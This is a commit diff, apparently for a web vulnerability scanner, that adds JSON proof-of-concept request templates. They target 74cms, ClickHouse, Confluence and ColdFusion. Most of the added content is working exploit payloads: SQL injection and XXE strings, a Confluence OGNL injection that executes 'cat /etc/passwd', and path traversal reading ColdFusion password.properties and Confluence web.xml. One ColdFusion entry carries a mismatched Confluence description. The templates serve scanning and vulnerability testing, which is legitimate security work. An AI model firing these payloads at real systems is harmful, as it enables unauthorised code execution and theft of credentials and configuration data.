集成 @xiaotu0821 chumeng 师傅的json版本POC for Web-Scan 2022-08-18

Author: hktalent

config/config.json

@@ -102,5 +102,10 @@
   "Fuzzthreads": 32,
   "enableFingerTitleHeaderMd5Hex": false,
   "Cookie": "",
-  "esUrl": "http://127.0.0.1:9200/%s_index/_doc/%s"
+  "esUrl": "http://127.0.0.1:9200/%s_index/_doc/%s",
+  "Exploit":{
+    "Path": "./config/poc/",
+    "Logs": "./logs/errror.log"
+  },
+  "enableWebScan": false
 }

config/config_me.json

@@ -89,5 +89,10 @@
   "Fuzzthreads": 32,
   "enableFingerTitleHeaderMd5Hex": false,
   "Cookie": "",
-  "esUrl": "http://127.0.0.1:9200/%s_index/_doc/%s"
+  "esUrl": "http://127.0.0.1:9200/%s_index/_doc/%s",
+  "Exploit":{
+    "Path": "./config/poc/",
+    "Logs": "./logs/errror.log"
+  },
+  "enableWebScan": true
 }

config/poc/74cms/74cms-sqli-1.json

@@ -0,0 +1,33 @@
+{
+    "Name": "74cms-sqli-1",
+    "Description": "74cms-sqli-1",
+    "Product": "骑士cms",
+    "author": "chumeng",
+    "Request":[
+        {
+        "Method": "POST",
+        "Header": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36",
+            "Content-Type":"text/xml"},
+        "Uri":"/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709\\xc3\\x97tamp=&nonce=",
+        "Port":"",
+        "Data":"<?xml version=\"1.0\" encoding=\"utf-8\"?><!DOCTYPE copyright [<!ENTITY test SYSTEM \"file:///\">]><xml><ToUserName>&test;</ToUserName><FromUserName>1111</FromUserName><MsgType>123</MsgType><FuncFlag>3</FuncFlag><Content>1%' union select md5(123)#</Content></xml>",
+        "follow_redirects":"false",
+        "Upload":{"Name": "","fileName": "","filePath": "" },
+        "Response":{
+            "Check_Steps":"AND",
+            "Checks": [
+                    {
+                    "Operation": "contains", 
+                    "Key":"",
+                    "Value": "202cb962ac59075b964b07152d234b70"
+                    },
+                     {
+                    "Operation": "code", 
+                    "Key":"",
+                    "Value": "200"  
+                     }
+            ]
+            },
+            "Next_decide":""
+        }
+    ]}

config/poc/74cms/74cms-sqli-2.json

@@ -0,0 +1,32 @@
+{
+    "Name": "74cms-sqli-2",
+    "Description": "74cms-sqli-2",
+    "Product": "骑士cms",
+    "author": "chumeng",
+    "Request":[
+        {
+        "Method": "GET",
+        "Header": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"},
+        "Uri":"/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{rand}}),5,6,7,8,9%23",
+        "Port":"",
+        "Data":"",
+        "follow_redirects":"false",
+        "Upload":{"Name": "","fileName": "","filePath": "" },
+        "Response":{
+            "Check_Steps":"AND",
+            "Checks": [
+                    {
+                    "Operation": "contains", 
+                    "Key":"",
+                    "Value": "202cb962ac59075b964b07152d234b70"
+                    },
+                     {
+                    "Operation": "code", 
+                    "Key":"",
+                    "Value": "200"  
+                     }
+            ]
+            },
+            "Next_decide":""
+        }
+     ] }

config/poc/74cms/74cms-sqli-3.json

@@ -0,0 +1,32 @@
+{
+    "Name": "74cms-sqli-3",
+    "Description": "74cms-sqli-3",
+    "Product": "骑士cms",
+    "author": "chumeng",
+    "Request":[
+        {
+        "Method": "GET",
+        "Header": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"},
+        "Uri":"/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa\") and extractvalue(1,concat(0x7e,md5(99999999))) -- a",
+        "Port":"",
+        "Data":"",
+        "follow_redirects":"false",
+        "Upload":{"Name": "","fileName": "","filePath": "" },
+        "Response":{
+            "Check_Steps":"AND",
+            "Checks": [
+                    {
+                    "Operation": "contains", 
+                    "Key":"",
+                    "Value": "ef775988943825d2871e1cfa75473ec"
+                    },
+                     {
+                    "Operation": "code", 
+                    "Key":"",
+                    "Value": "200"  
+                     }
+            ]
+            },
+            "Next_decide":""
+        }
+    ]}

config/poc/ClickHouse未授权访问.json

@@ -0,0 +1,39 @@
+{
+    "Name": "ClickHouse未授权访问",
+    "Description": "ClickHouse数据库未授权访问查询",
+    "Product": "ClickHouse",
+    "author": "chumeng",
+    "Request":[
+                {
+        "Method": "GET",
+        "Header": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"},
+        "Uri":"/?query=SHOW%20tables%20from%20system",
+        "Port":"",
+        "Data":"",
+        "Follow_redirects":"false",
+        "Upload":{"Name": "","fileName": "","filePath": "" },
+        "Response":{
+        "Check_Steps":"AND",
+        "Checks": [
+            {
+                "Operation": "contains",
+                "Key":"",
+                "Value": "zeros_mt"
+            },
+            {
+                "Operation": "contains",
+                "Key":"",
+                "Value": "aggregate_function_combinators"
+            },
+            {
+                "Operation": "code",
+                "Key":"",
+                "Value": "200"
+            }
+
+
+        ]
+        },
+        "Next_decide":""
+                }
+]}

config/poc/Confluence/Confluence_OGNL表达式注入.json

@@ -0,0 +1,33 @@
+{
+    "Name": "Confluence OGNL表达式注入",
+    "Description": "Atlassian Confluence是企业广泛使用的wiki系统,产品研发过程中的需求文档、产品设计文档、项目管理文档、技术文档、运维文档等等都统一发布在wiki中，并不断地迭代维护。所以想着自己的协同的办公也可使Confluence来实现，远程攻击者在经过身份验证或在特定环境下未经身份验证的情况下，可构造OGNL表达式进行注入，实现在 Confluence Server或Data Center上执行任意代码.",
+    "Product": "Atlassian Confluence",
+    "author": "chumeng",
+    "Request":[
+        {
+        "Method": "POST",
+        "Header": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36",
+            "Content-Type":"application/x-www-form-urlencoded"},
+        "Uri":"/pages/createpage-entervariables.action?SpaceKey=x",
+        "Port":"",
+        "Data":"queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022cat+/etc/passwd%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027",
+        "Follow_redirects":"false",
+        "Upload":{"Name": "","fileName": "","filePath": "" },
+        "Response":{
+        "Check_Steps":"AND",
+        "Checks": [
+                {
+                "Operation": "contains", 
+                "Key":"",
+                "Value": "root:x:0:0:root"
+                },
+                 {
+                "Operation": "code", 
+                "Key":"",
+                "Value": "200"  
+                 }
+        ]
+        },
+        "Next_decide":""
+                }
+]}

config/poc/Confluence/Confluence远程代码执行漏洞.json

@@ -0,0 +1,32 @@
+{
+    "Name": "CVE-2021-26084Confluence远程代码执行漏洞",
+    "Description": "Confluence",
+    "Product": "Confluence",
+    "author": "chumeng",
+    "Request":[
+        {
+        "Method": "POST",
+        "Header": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"},
+        "Uri":"/pages/doenterpagevariables.action",
+        "Port":"",
+        "Data":"queryString=aaaa\\u0027%2b#{3*333}%2b\\u0027bbb",
+        "Follow_redirects":"false",
+        "Upload":{"Name": "","fileName": "","filePath": "" },
+        "Response":{
+        "Check_Steps":"AND",
+        "Checks": [
+                {
+                "Operation": "contains", 
+                "Key":"",
+                "Value": "aaaa{999"
+                },
+                 {
+                "Operation": "code", 
+                "Key":"",
+                "Value": "200"  
+                 }
+        ]
+        },
+        "Next_decide":""
+                }
+]}

config/poc/Confluence/coldfusion-cve-2010-2861-lfi.json

@@ -0,0 +1,38 @@
+{
+    "Name": "coldfusion-cve-2010-2861-lfi",
+    "Description": "Atlassian Confluence是企业广泛使用的wiki系统,产品研发过程中的需求文档、产品设计文档、项目管理文档、技术文档、运维文档等等都统一发布在wiki中，并不断地迭代维护。所以想着自己的协同的办公也可使Confluence来实现，远程攻击者在经过身份验证或在特定环境下未经身份验证的情况下，可构造OGNL表达式进行注入，实现在 Confluence Server或Data Center上执行任意代码.",
+    "Product": "Atlassian Confluence",
+    "author": "chumeng",
+    "Request":[
+        {
+        "Method": "GET",
+        "Header": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36",
+            "Content-Type":"application/x-www-form-urlencoded"},
+        "Uri":"/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en",
+        "Port":"",
+        "Data":"",
+        "Follow_redirects":"false",
+        "Upload":{"Name": "","fileName": "","filePath": "" },
+        "Response":{
+        "Check_Steps":"AND",
+        "Checks": [
+                {
+                "Operation": "contains", 
+                "Key":"",
+                "Value": "rdspassword"
+                },
+                {
+                    "Operation": "contains", 
+                    "Key":"",
+                    "Value": "encrypted="
+                    },
+                 {
+                "Operation": "code", 
+                "Key":"",
+                "Value": "200"  
+                 }
+        ]
+        },
+        "Next_decide":""
+                }
+]}

config/poc/Confluence/confluence-cve-2015-8399.json

@@ -0,0 +1,36 @@
+{
+    "Name": "confluence-cve-2015-8399",
+    "Description": "Atlassian Confluence是企业广泛使用的wiki系统,产品研发过程中的需求文档、产品设计文档、项目管理文档、技术文档、运维文档等等都统一发布在wiki中，并不断地迭代维护。所以想着自己的协同的办公也可使Confluence来实现，远程攻击者在经过身份验证或在特定环境下未经身份验证的情况下，可构造OGNL表达式进行注入，实现在 Confluence Server或Data Center上执行任意代码.",
+    "Product": "Atlassian Confluence",
+    "author": "chumeng",
+    "Request":[
+        {
+        "Method": "GET",
+        "Header": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"},
+        "Uri":"/spaces/viewdefaultdecorator.action?decoratorName",
+        "Port":"",
+        "Data":"",
+        "Follow_redirects":"false",
+        "Upload":{"Name": "","fileName": "","filePath": "" },
+        "Response":{
+        "Check_Steps":"AND",
+        "Checks": [
+                {
+                "Operation": "contains", 
+                "Key":"",
+                "Value": "confluence-init.properties"
+                }, {
+                    "Operation": "contains", 
+                    "Key":"",
+                    "Value": "View Default Decorator"
+                    },
+                 {
+                "Operation": "code", 
+                "Key":"",
+                "Value": "200"  
+                 }
+        ]
+        },
+        "Next_decide":""
+                }
+]}

config/poc/Confluence/confluence-cve-2019-3396-lfi.json

@@ -0,0 +1,33 @@
+{
+    "Name": "confluence-cve-2019-3396-lfi",
+    "Description": "Atlassian Confluence是企业广泛使用的wiki系统,产品研发过程中的需求文档、产品设计文档、项目管理文档、技术文档、运维文档等等都统一发布在wiki中，并不断地迭代维护。所以想着自己的协同的办公也可使Confluence来实现，远程攻击者在经过身份验证或在特定环境下未经身份验证的情况下，可构造OGNL表达式进行注入，实现在 Confluence Server或Data Center上执行任意代码.",
+    "Product": "Atlassian Confluence",
+    "author": "chumeng",
+    "Request":[
+        {
+        "Method": "POST",
+        "Header": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36",
+        "Content-Type":"application/json","Host":"localhost","Referer":"http://localhost"},
+        "Uri":"/rest/tinymce/1/macro/preview",
+        "Port":"",
+        "Data":"{\"contentId\":\"786458\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/test\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}",
+        "Follow_redirects":"false",
+        "Upload":{"Name": "","fileName": "","filePath": "" },
+        "Response":{
+        "Check_Steps":"AND",
+        "Checks": [
+                {
+                "Operation": "contains", 
+                "Key":"",
+                "Value": "<param-name>contextConfigLocation</param-name>"
+                },
+                 {
+                "Operation": "code", 
+                "Key":"",
+                "Value": "200"  
+                 }
+        ]
+        },
+        "Next_decide":""
+                }
+]}

config/poc/Confluence/confluence-cve-2021-26085-arbitrary-file-read.json

@@ -0,0 +1,37 @@
+{
+    "Name": "confluence-cve-2021-26085-arbitrary-file-read",
+    "Description": "Atlassian Confluence是企业广泛使用的wiki系统,产品研发过程中的需求文档、产品设计文档、项目管理文档、技术文档、运维文档等等都统一发布在wiki中，并不断地迭代维护。所以想着自己的协同的办公也可使Confluence来实现，远程攻击者在经过身份验证或在特定环境下未经身份验证的情况下，可构造OGNL表达式进行注入，实现在 Confluence Server或Data Center上执行任意代码.",
+    "Product": "Atlassian Confluence",
+    "author": "chumeng",
+    "Request":[
+        {
+        "Method": "GET",
+        "Header": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36",
+            "Content-Type":"application/x-www-form-urlencoded"},
+        "Uri":"/s/avacea/_/;/WEB-INF/web.xml",
+        "Port":"",
+        "Data":"",
+        "Follow_redirects":"false",
+        "Upload":{"Name": "","fileName": "","filePath": "" },
+        "Response":{
+        "Check_Steps":"AND",
+        "Checks": [
+                {
+                "Operation": "contains", 
+                "Key":"",
+                "Value": "<display-name>Confluence</display-name>"
+                }, {
+                    "Operation": "contains", 
+                    "Key":"",
+                    "Value": "com.atlassian.confluence.setup.ConfluenceAppConfig"
+                    },
+                 {
+                "Operation": "code", 
+                "Key":"",
+                "Value": "200"  
+                 }
+        ]
+        },
+        "Next_decide":""
+                }
+]}